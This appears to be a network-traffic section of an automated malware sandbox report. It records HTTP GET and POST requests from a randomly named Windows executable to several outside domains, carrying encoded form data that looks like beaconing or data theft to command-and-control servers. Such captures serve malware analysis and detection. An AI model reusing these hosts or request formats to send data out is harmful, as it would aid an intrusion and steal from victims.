Jul 26, 2024 09:42:18.437603951 CEST	1236	IN	HTTP/1.1 200 OK date: Fri, 26 Jul 2024 07:42:18 GMT content-type: text/html; charset=utf-8 content-length: 1154 x-request-id: 1b53454a-05d1-4f04-9681-8e5d9c41da21 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_jPtUgrx5DV4fL/ivXnRjfD/BEnBR+kYAgYaALsG4Lq5V+59/lDZiMC1fTumUMgpKDOYt33qpCu9oGmwS/lHtuw== set-cookie: parking_session=1b53454a-05d1-4f04-9681-8e5d9c41da21; expires=Fri, 26 Jul 2024 07:57:18 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6a 50 74 55 67 72 78 35 44 56 34 66 4c 2f 69 76 58 6e 52 6a 66 44 2f 42 45 6e 42 52 2b 6b 59 41 67 59 61 41 4c 73 47 34 4c 71 35 56 2b 35 39 2f 6c 44 5a 69 4d 43 31 66 54 75 6d 55 4d 67 70 4b 44 4f 59 74 33 33 71 70 43 75 39 6f 47 6d 77 53 2f 6c 48 74 75 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_jPtUgrx5DV4fL/ivXnRjfD/BEnBR+kYAgYaALsG4Lq5V+59/lDZiMC1fTumUMgpKDOYt33qpCu9oGmwS/lHtuw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jul 26, 2024 09:42:18.437772036 CEST	607	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMWI1MzQ1NGEtMDVkMS00ZjA0LTk2ODEtOGU1ZDljNDFkYTIxIiwicGFnZV90aW1lIjoxNzIxOTc5Nz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49735	199.59.243.226	80	6336	C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 09:42:20.570672989 CEST	518	OUT	GET /lxy9/?JNx8tTw=aMYCWBWby78cu2Pg5kxC7/s+ledqG+yLUHOKH+0jK4PAR/gCFqdm34ajEirZUZfXHWNx+XxCFLbhto71FEYU7CwGQbfx96/8sGe6uy0dOdRuFla+tLr5WY0xGsTDrvD3UQ==&F0a=DDvTXr_Hk HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.counseloratlaw1806.xyz Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36
Jul 26, 2024 09:42:21.016109943 CEST	1236	IN	HTTP/1.1 200 OK date: Fri, 26 Jul 2024 07:42:20 GMT content-type: text/html; charset=utf-8 content-length: 1522 x-request-id: c755af36-1643-4f4d-9f4d-795d0ac73eec cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_TJ/nmcDirN71Oh0fLJYkh4jzfCJh2vNCQ5Kn8EmCmkTf0ET5je0C8+0xFmO57uJaKbmAH+coVTTabq1e3/1xNg== set-cookie: parking_session=c755af36-1643-4f4d-9f4d-795d0ac73eec; expires=Fri, 26 Jul 2024 07:57:20 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 54 4a 2f 6e 6d 63 44 69 72 4e 37 31 4f 68 30 66 4c 4a 59 6b 68 34 6a 7a 66 43 4a 68 32 76 4e 43 51 35 4b 6e 38 45 6d 43 6d 6b 54 66 30 45 54 35 6a 65 30 43 38 2b 30 78 46 6d 4f 35 37 75 4a 61 4b 62 6d 41 48 2b 63 6f 56 54 54 61 62 71 31 65 33 2f 31 78 4e 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_TJ/nmcDirN71Oh0fLJYkh4jzfCJh2vNCQ5Kn8EmCmkTf0ET5je0C8+0xFmO57uJaKbmAH+coVTTabq1e3/1xNg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jul 26, 2024 09:42:21.016469002 CEST	975	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzc1NWFmMzYtMTY0My00ZjRkLTlmNGQtNzk1ZDBhYzczZWVjIiwicGFnZV90aW1lIjoxNzIxOTc5Nz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49736	65.181.134.177	80	6336	C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 09:42:26.734072924 CEST	761	OUT	POST /0190/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.by8991.vip Content-Length: 208 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.by8991.vip Referer: http://www.by8991.vip/0190/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 Data Raw: 4a 4e 78 38 74 54 77 3d 55 34 73 78 4b 79 39 44 41 45 43 6b 34 4a 33 2f 31 74 6f 4f 76 71 73 4e 68 76 42 57 77 73 42 38 5a 4e 70 69 46 46 72 2f 35 74 41 6a 76 33 66 2b 36 71 64 6c 2f 31 4f 39 41 33 36 44 78 76 31 6a 68 48 67 6f 6e 65 54 56 63 38 4d 55 4e 42 44 52 6c 41 34 6f 65 34 66 53 74 4b 6d 79 46 42 6c 44 2f 70 66 4c 46 6f 4d 51 32 66 79 70 42 41 5a 6a 65 4d 6c 58 48 58 73 76 36 61 44 59 46 6e 6b 68 39 64 47 76 44 52 53 46 6b 52 6d 44 73 72 48 74 50 4e 4e 70 55 33 53 6d 37 76 62 61 70 74 6f 42 79 4e 49 77 72 41 6e 52 36 65 55 77 73 4a 75 50 46 6b 4a 77 31 55 6b 54 55 54 6c 54 45 77 63 67 4e 63 61 62 4b 62 51 3d Data Ascii: JNx8tTw=U4sxKy9DAECk4J3/1toOvqsNhvBWwsB8ZNpiFFr/5tAjv3f+6qdl/1O9A36Dxv1jhHgoneTVc8MUNBDRlA4oe4fStKmyFBlD/pfLFoMQ2fypBAZjeMlXHXsv6aDYFnkh9dGvDRSFkRmDsrHtPNNpU3Sm7vbaptoByNIwrAnR6eUwsJuPFkJw1UkTUTlTEwcgNcabKbQ=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49737	65.181.134.177	80	6336	C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 09:42:29.323256969 CEST	781	OUT	POST /0190/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.by8991.vip Content-Length: 228 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.by8991.vip Referer: http://www.by8991.vip/0190/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 Data Raw: 4a 4e 78 38 74 54 77 3d 55 34 73 78 4b 79 39 44 41 45 43 6b 34 70 48 2f 33 4f 41 4f 70 4b 73 4f 34 76 42 57 2b 4d 42 77 5a 4e 74 69 46 45 65 36 35 2b 6f 6a 6f 57 76 2b 37 76 39 6c 34 31 4f 39 4f 58 36 47 31 76 31 34 68 48 6c 64 6e 61 62 56 63 2f 77 55 4e 44 4c 52 6c 7a 41 72 59 34 66 51 67 71 6d 77 59 52 6c 44 2f 70 66 4c 46 6f 59 71 32 66 71 70 42 77 70 6a 65 74 6c 55 4f 33 73 73 39 61 44 59 50 33 6b 6c 39 64 48 38 44 56 4b 2f 6b 54 75 44 73 70 66 74 50 5a 52 71 4f 6e 53 67 2f 76 61 6c 6d 6f 46 4d 2b 4d 49 47 6a 69 37 5a 6a 34 67 6c 70 2f 44 6c 66 47 42 59 6d 30 49 72 45 41 74 6b 56 41 39 4a 58 2f 4b 72 55 4d 47 6d 6b 70 62 4e 6c 56 7a 53 34 57 52 77 30 63 59 4f 4a 51 31 53 Data Ascii: JNx8tTw=U4sxKy9DAECk4pH/3OAOpKsO4vBW+MBwZNtiFEe65+ojoWv+7v9l41O9OX6G1v14hHldnabVc/wUNDLRlzArY4fQgqmwYRlD/pfLFoYq2fqpBwpjetlUO3ss9aDYP3kl9dH8DVK/kTuDspftPZRqOnSg/valmoFM+MIGji7Zj4glp/DlfGBYm0IrEAtkVA9JX/KrUMGmkpbNlVzS4WRw0cYOJQ1S

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49738	65.181.134.177	80	6336	C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 09:42:31.889897108 CEST	1798	OUT	POST /0190/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.by8991.vip Content-Length: 1244 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.by8991.vip Referer: http://www.by8991.vip/0190/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 Data Raw: 4a 4e 78 38 74 54 77 3d 55 34 73 78 4b 79 39 44 41 45 43 6b 34 70 48 2f 33 4f 41 4f 70 4b 73 4f 34 76 42 57 2b 4d 42 77 5a 4e 74 69 46 45 65 36 35 34 77 6a 6f 6b 58 2b 39 4a 31 6c 35 31 4f 39 47 33 36 48 31 76 30 67 68 44 41 56 6e 61 58 46 63 36 38 55 63 57 66 52 6a 43 41 72 4c 59 66 51 2f 36 6d 7a 46 42 6c 57 2f 6f 76 50 46 6f 49 71 32 66 71 70 42 79 78 6a 63 38 6c 55 43 58 73 76 36 61 44 63 46 6e 6b 4e 39 64 76 73 44 56 47 76 6b 69 4f 44 72 4a 50 74 63 61 35 71 46 6e 53 69 7a 50 61 39 6d 6f 41 4d 2b 4d 55 77 6a 6a 65 43 6a 2f 55 6c 6f 5a 4f 48 4d 79 42 35 79 30 56 50 4d 41 41 41 56 58 4a 4d 5a 49 6d 71 57 65 36 45 67 5a 58 4f 6b 53 6e 64 38 79 5a 2b 70 39 42 59 4e 41 67 41 59 33 56 4b 36 78 4a 72 36 42 36 7a 55 30 6a 59 48 47 6f 5a 32 77 4a 64 62 6d 65 42 46 44 54 56 77 5a 57 72 2f 72 4d 76 4b 77 7a 76 63 57 59 62 47 30 2f 4e 43 4c 53 78 32 57 37 48 66 6e 4b 38 39 44 7a 59 4b 38 2b 4f 6e 52 41 4c 33 42 30 41 58 6b 4a 75 48 39 2f 77 31 5a 48 6c 64 63 38 58 79 48 77 36 54 64 41 4d 55 37 4b 55 42 2b [TRUNCATED] Data Ascii: JNx8tTw=U4sxKy9DAECk4pH/3OAOpKsO4vBW+MBwZNtiFEe654wjokX+9J1l51O9G36H1v0ghDAVnaXFc68UcWfRjCArLYfQ/6mzFBlW/ovPFoIq2fqpByxjc8lUCXsv6aDcFnkN9dvsDVGvkiODrJPtca5qFnSizPa9moAM+MUwjjeCj/UloZOHMyB5y0VPMAAAVXJMZImqWe6EgZXOkSnd8yZ+p9BYNAgAY3VK6xJr6B6zU0jYHGoZ2wJdbmeBFDTVwZWr/rMvKwzvcWYbG0/NCLSx2W7HfnK89DzYK8+OnRAL3B0AXkJuH9/w1ZHldc8XyHw6TdAMU7KUB+4/xs+tqT3B/OzKvzQSBC5yTzSj19gzXrZ3FWfVqanGTvNhMyLkwqCI/6CyY9J8acGhiGjHQtjDDQa0u/E3/qPnC7qs0TV15v9qKL9t09u9Zexlkbv1d3JmSxEmRH8Qc19yAmMOuvMABmJaIpUGQZKphj3V8aBbvhBBMwyaLrwFMNuF+lyDn8JZMpIbGOM5GhB/Z9ZXeHBG6u1/SjPBu1aAk/4Bz9nMLj9LVTpBmb9H37kHGYO5QSBIHUtUX+0Kq9wDrc2VXFLtUlK9aX2faNdHQZFDba6/d/aNCgdK30J1DXPYrFYit/6YrVJw/I9DeOcIJCPpa622SY+wCPwn7k6hfDuZo/GeactMmthOi/KyefG7Aor1mGFq+0xeL8tI67uS443yK7qcddg83/M1HnVdrSZynFMOKOMYsSieEA9iKfSFjfP9Yqb9HMjDTKMrKe83Mfmqp+nHiIZoRcusSAh7kUh64YX7hkL9KNRJAPLzLBu3z6dLBaWPxB8Ds6SdAVXLICaQ64UW6hgPo7B8Umbi+IgAtCoVdnUwLqqWgJ6vTRGWllb1UxZgRVEFaPx+dg7CIdc0lH+61QqaCuqa6HBqkUOjlBmLzi4U2vztpMA1G2VDxZ0Rsm8Ke9p3DsNUKsGf/fVr5lCaupSamiJq21ScgZA3o1RlF0j2 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49739	65.181.134.177	80	6336	C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 09:42:34.466281891 CEST	506	OUT	GET /0190/?F0a=DDvTXr_Hk&JNx8tTw=Z6ERJFoDCUfQsIq8ofQDjrU1/9I1+MRHON9wFl6H5eE5mUn/k+ER1FqTfAe8nYNZ1iEuv5/EQNBLECXnnxN4D66rqY36fh1KhKiNJpoJ9uKwS3VDPLljB2Epzr3xCgB2gg== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.by8991.vip Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36
Jul 26, 2024 09:42:43.250268936 CEST	748	IN	HTTP/1.1 302 Found Date: Fri, 26 Jul 2024 07:42:43 GMT Content-Length: 0 Connection: close Set-Cookie: http_waf_cookie=55c06821-6fab-4d3e9a7b641e4a81a463536a82ae40f3c271; Expires=1721986962; Path=/; HttpOnly Set-Cookie: acw_tc=ac11000117219797629878627e00894adc3210a5a47b3b05e6d319e9d4ec56;path=/;HttpOnly;Max-Age=1800 location: https://www.by3393.com:35522/register?i_code=2867599 jckl: NCbGKx7dIzQL3XVbw+Q9i2TAztOaB9MWTVGIrt3CR/qfhr4ZdXJk2FF37hSvwI9lZVposY/MngG/Jy39hBrQ/Q== x-content-type-options: nosniff x-xss-protection: 1 strict-transport-security: max-age=63072000; includeSubdomains; preload Via: 1.1 google, 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 X-Request-Id: 2b562d816f0ae15e231f327095c1f7ad

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49740	3.33.244.179	80	6336	C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 09:42:48.668580055 CEST	779	OUT	POST /m0g5/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.corbincodes.tech Content-Length: 208 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.corbincodes.tech Referer: http://www.corbincodes.tech/m0g5/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 Data Raw: 4a 4e 78 38 74 54 77 3d 69 38 64 2b 51 67 6d 54 48 4c 74 68 52 68 6f 32 6b 70 7a 59 55 54 30 35 46 43 62 53 75 2f 70 61 68 38 39 4b 61 4f 6c 44 58 2b 53 35 4f 36 68 54 77 71 2b 79 51 58 43 31 5a 48 50 33 38 6c 41 33 47 77 45 53 6e 51 33 37 49 31 66 4a 37 58 4f 74 65 4d 2f 54 57 4d 76 4f 4f 38 42 39 31 5a 37 76 4c 77 37 4b 34 44 48 41 65 75 62 37 65 2b 6a 6c 77 51 71 76 4e 38 42 48 63 6f 46 68 51 7a 44 51 69 54 37 77 37 35 2f 70 6a 78 62 34 66 59 55 66 65 69 44 43 31 45 46 4a 6a 33 77 53 30 47 30 62 33 6a 42 4e 44 7a 69 4a 61 6c 4e 73 32 55 7a 66 45 4e 2f 2b 44 30 4b 39 57 37 74 74 2b 74 54 53 47 32 4d 74 65 45 73 3d Data Ascii: JNx8tTw=i8d+QgmTHLthRho2kpzYUT05FCbSu/pah89KaOlDX+S5O6hTwq+yQXC1ZHP38lA3GwESnQ37I1fJ7XOteM/TWMvOO8B91Z7vLw7K4DHAeub7e+jlwQqvN8BHcoFhQzDQiT7w75/pjxb4fYUfeiDC1EFJj3wS0G0b3jBNDziJalNs2UzfEN/+D0K9W7tt+tTSG2MteEs=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49741	3.33.244.179	80	6336	C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 09:42:51.270817995 CEST	799	OUT	POST /m0g5/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.corbincodes.tech Content-Length: 228 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.corbincodes.tech Referer: http://www.corbincodes.tech/m0g5/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 Data Raw: 4a 4e 78 38 74 54 77 3d 69 38 64 2b 51 67 6d 54 48 4c 74 68 44 52 34 32 6e 49 7a 59 46 6a 30 36 5a 79 62 53 67 76 70 65 68 38 68 4b 61 4d 49 59 57 4d 47 35 4a 66 64 54 78 76 53 79 64 33 43 31 57 6e 50 79 34 6c 41 67 47 77 49 30 6e 51 4c 37 49 31 37 4a 37 54 43 74 64 2f 6e 51 57 63 76 4d 43 63 42 7a 6f 4a 37 76 4c 77 37 4b 34 44 54 71 65 75 44 37 65 4e 72 6c 79 78 71 75 4f 38 41 31 4b 34 46 68 55 7a 44 71 69 54 37 6f 37 36 37 44 6a 7a 6a 34 66 59 6b 66 65 33 76 42 67 55 46 50 6e 33 77 4d 34 30 63 58 32 68 42 34 45 54 2f 31 4f 48 52 6a 36 43 65 31 65 76 33 57 51 55 6d 46 47 6f 6c 61 76 64 79 37 63 56 63 64 41 54 36 2f 38 70 4a 63 57 78 6c 47 63 32 62 30 4e 7a 2f 43 54 51 78 53 Data Ascii: JNx8tTw=i8d+QgmTHLthDR42nIzYFj06ZybSgvpeh8hKaMIYWMG5JfdTxvSyd3C1WnPy4lAgGwI0nQL7I17J7TCtd/nQWcvMCcBzoJ7vLw7K4DTqeuD7eNrlyxquO8A1K4FhUzDqiT7o767Djzj4fYkfe3vBgUFPn3wM40cX2hB4ET/1OHRj6Ce1ev3WQUmFGolavdy7cVcdAT6/8pJcWxlGc2b0Nz/CTQxS

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	49742	3.33.244.179	80	6336	C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 09:42:53.856777906 CEST	1816	OUT	POST /m0g5/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.corbincodes.tech Content-Length: 1244 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.corbincodes.tech Referer: http://www.corbincodes.tech/m0g5/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 Data Raw: 4a 4e 78 38 74 54 77 3d 69 38 64 2b 51 67 6d 54 48 4c 74 68 44 52 34 32 6e 49 7a 59 46 6a 30 36 5a 79 62 53 67 76 70 65 68 38 68 4b 61 4d 49 59 57 4d 2b 35 4f 71 52 54 78 4d 4b 79 53 58 43 31 49 58 50 7a 34 6c 41 59 47 77 41 6f 6e 51 48 52 49 33 54 4a 70 67 4b 74 56 75 6e 51 44 73 76 4d 4b 38 42 2b 31 5a 36 33 4c 77 72 4f 34 44 44 71 65 75 44 37 65 4d 62 6c 31 67 71 75 49 38 42 48 63 6f 46 74 51 7a 43 6b 69 54 44 34 37 37 50 35 6a 43 44 34 66 34 30 66 63 46 33 42 39 6b 46 4e 67 33 78 66 34 30 42 4a 32 68 64 43 45 51 6a 4c 4f 46 52 6a 34 6e 76 52 4e 63 6e 56 42 6e 47 6a 47 37 73 38 32 36 37 59 62 55 77 7a 4a 6a 43 41 35 36 64 79 59 6d 46 42 49 6c 4b 2b 53 57 6e 30 66 6c 77 44 42 64 43 30 75 42 52 57 57 4c 46 51 77 35 61 44 4f 54 2f 76 52 4c 6c 58 63 57 39 47 2f 4f 7a 6a 70 72 2b 64 33 52 73 54 66 72 65 72 38 30 34 42 35 56 6e 71 59 6c 4f 6f 61 36 68 32 6d 2b 77 71 2b 51 57 4f 31 4d 61 49 59 38 51 30 73 6b 4c 76 35 59 6f 36 45 77 55 79 47 5a 43 31 43 55 58 70 4c 51 45 45 48 31 4f 4c 31 38 76 68 79 6d [TRUNCATED] Data Ascii: JNx8tTw=i8d+QgmTHLthDR42nIzYFj06ZybSgvpeh8hKaMIYWM+5OqRTxMKySXC1IXPz4lAYGwAonQHRI3TJpgKtVunQDsvMK8B+1Z63LwrO4DDqeuD7eMbl1gquI8BHcoFtQzCkiTD477P5jCD4f40fcF3B9kFNg3xf40BJ2hdCEQjLOFRj4nvRNcnVBnGjG7s8267YbUwzJjCA56dyYmFBIlK+SWn0flwDBdC0uBRWWLFQw5aDOT/vRLlXcW9G/Ozjpr+d3RsTfrer804B5VnqYlOoa6h2m+wq+QWO1MaIY8Q0skLv5Yo6EwUyGZC1CUXpLQEEH1OL18vhymF445alFsSKVkSN5XQrWfFe0++OPu72fd4fA0OqLjWXIf7r9jkZeA3pG4CQZutXhhnsKT7eWwj5DeFDMBq28ubVJvvKIabjyFxk95TwnqEIoG9kNefyzPA3l7e4xmxsq8txX9b7dLR+HFmr3I5Gs6P0l+UXFMMw4N+L91rsTr9UWAGjzJPnOoYEg1M/luXY0N43flh0A1I3FRNjn0xAIF8TtmRrsuADzQnr59pcfUa074tWq2iaNZp8atAlkX54cvgrCbIuUK+RrFggZrVITt0i0qpSyVlue0CRz6951KB8RANJApecrsAP0jt1RpNrfCilot2W5+vkcZfKTYMDFYTzCa1bnyx4dmzAbKHTlq5soKlsn9RFuAdGdEJmgts7mu/WyrZV1EzbYxuCGxOy5NPgVJtIf8YCVZ2Eo8M6ORenbgTI7lLXwgFbaFIhiiO/A3x4w8/DFQrVET+F8SZDp3ksQ/cYiGDM6OSpGUiqSTTPrNALezxSy7vubZFy+ufOFp5PcYNdY9InRxsLJreQsCtTGSs35ckNODa2o5mnvtwVBo5o3RUJnUyURYWXetGzJhVTvJyqbADLD+YIoii7GOAv1rPFUyvvlXLj/iaistLlcP9FFJikbvLYZn6ZSznUQd5vYlVMpqJWbVv7E63/8wsVhgM9bBB+UbGy [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port
28	192.168.2.5	49743	3.33.244.179	80

Timestamp	Bytes transferred	Direction	Data
